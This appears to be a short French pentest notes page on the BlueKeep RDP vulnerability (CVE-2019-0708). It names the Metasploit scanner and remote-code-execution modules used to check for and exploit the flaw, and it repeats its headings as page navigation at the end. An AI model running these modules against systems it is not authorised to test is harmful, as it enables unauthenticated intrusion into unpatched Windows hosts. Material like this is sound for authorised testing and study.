BlueKeep Exploitation

BlueKeep (CVE-2019-0708) est une vulnérabilité critique affectant le protocole RDP (port 3389) sur les anciennes versions de Windows. Elle permet une exécution de code à distance (RCE) sans authentification, facilitant la propagation de logiciels malveillants de type worm (comme WannaCry).

Exploitation avec Metasploit

Ouverture de Metasploit

msfconsole

Vérifier si la cible est vulnérable

On utilise le module suivant

use scanner/rdp/cve_2019_0708_bluekeep

Ce module nous confirme si la cible est vulnérable.

Exploitation

On utilise le module suivant :

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Mis à jour il y a 11 mois

hashtagExploitation avec Metasploit

hashtagVérifier si la cible est vulnérable

hashtagOn utilise le module suivant

hashtagExploitation

hashtagOn utilise le module suivant :

Exploitation avec Metasploit

Vérifier si la cible est vulnérable

On utilise le module suivant

Exploitation

On utilise le module suivant :